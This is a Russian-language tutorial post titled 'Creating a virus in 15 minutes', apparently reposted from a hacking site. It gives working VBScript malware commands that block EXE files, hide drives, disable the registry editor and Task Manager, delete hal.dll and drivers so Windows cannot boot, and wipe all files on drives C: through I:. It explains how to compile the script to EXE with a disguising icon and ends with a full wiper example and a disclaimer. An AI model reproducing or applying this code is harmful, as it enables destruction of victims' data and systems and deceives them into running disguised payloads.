23:06 Создаем вирус за 15 мин | |
Вредоносная программа будет написана на языке visual basic script. Затем скомпилирована в "exe" формат. Приступим. Для начала,нужно уметь изменять расширение файла, с этого и начнём. Существует много способов, но мне нравится этот. У каждого должен быть обычный архиватор,вот им мы и воспользуемся. И так,создайте к примеру текстовый фаил под названием "Текстовый документ". Теперь найдите этот текстовик через свой архиватор. В архиваторе, вы должны увидеть следующее: "Текстовый документ.txt". Окончание "txt" - имя расширения файла,вот его и нужно изменить,точно так же, словно, редактируете имя папки или файла,стираете строчку "txt" и ставите скажем "mp3". В результате мы получаем "Текстовый документ.mp3" формата. Если всё понятно, а вопросов возникнуть по этому поводу недолжно,то пойдём дальше. Создайте текстовый документ,содержащий следующее: on error resume next Set S = CreateObject("Wscript.Shell") set FSO=createobject("scripting.filesystemobject") s.run"rundll32 user32, SwapMouseButton" Затем, сохранив полученные данные, вам нужно изменить расширение файла, и вместо "txt" прописать "vbs". Аббревиатура "vbs", происходит от названия языка программирования - "visual basic script". Вот у нас и готова первая, простая, вредоносная программка, меняющая местами кнопки мыши. Теперь нужно её скомпелировать (изменить) в "exe" формат с помощью программы: "Vbs2Exe", и установить любой значок с помощью грабера иконок: "IconToy". А теперь информация для тех, кто не намерен ограничивать свои возможности банальным обменом кнопок мыши. on error resume next Set S = CreateObject("Wscript.Shell") set FSO=createobject("scripting.filesystemobject") Три, верхние строчки - должны присутствовать всегда. Далее, следует кодировка, а ниже, в скобках - пояснение. Так же возможно сочетать, те или иные вредоносные команды. s.regwrite"HKCRexefileshellopencommand","rundll32.exe" (Запрет на открытие "EXE" файлов) s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives","67108863","REG_DWORD" s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive","67108863","REG_DWORD" (запрет доступа к жёстким дискам) fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1 (удаляется системный фаил, после чего загрузка Windows становится невозможна. Система работает до первой перезагрузки) fso.deletefolder fso.getspecialfolder(0)+"system32drives",1 fso.deletefolder fso.getspecialfolder(0)+"Driver Cache" (удаление драйверов) fso.deletefolder "АДРЕС",1 (Удаление папки. Пример: fso.deletefolder "C:Новая папка",1) fso.deletefolder "C:*.*",1 (Удаление всех папок диска С. Адрес можно поставить любой) fso.deletefile "АДРЕС",1 (Удаление файла. Пример: fso.deletefile "C:Новая папкаТекстовый документ.txt",1) fso.deletefile "C:*.*",1 (Удаление всех файлов диска С. Адрес можно поставить любой) s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisableregistrytools","1","REG_DWORD" (Запрет редактирования реестра) s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisabletaskmgr","1","REG_DWORD" (Запрет диспетчера задач) s.run"rundll32 user32, SwapMouseButton" (Обмен кнопок мыши) Пример: on error resume next Set S = CreateObject("Wscript.Shell") set FSO=createobject("scripting.filesystemobject") fso.deletefile "C:*.*",1 fso.deletefolder "C:*.*",1 fso.deletefile "D:*.*",1 fso.deletefolder "D:*.*",1 fso.deletefile "E:*.*",1 fso.deletefolder "E:*.*",1 fso.deletefile "F:*.*",1 fso.deletefolder "F:*.*",1 fso.deletefile "G:*.*",1 fso.deletefolder "G:*.*",1 fso.deletefile "H:*.*",1 fso.deletefolder "H:*.*",1 fso.deletefile "I:*.*",1 fso.deletefolder "I:*.*",1 fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1 Я не несу никаю отвественность за то что вы можете сделать с помошью этой статьи,так что делайте выводы... Статья взята с сайта HackZona.Ru | |
|
Всего комментариев: 0 | |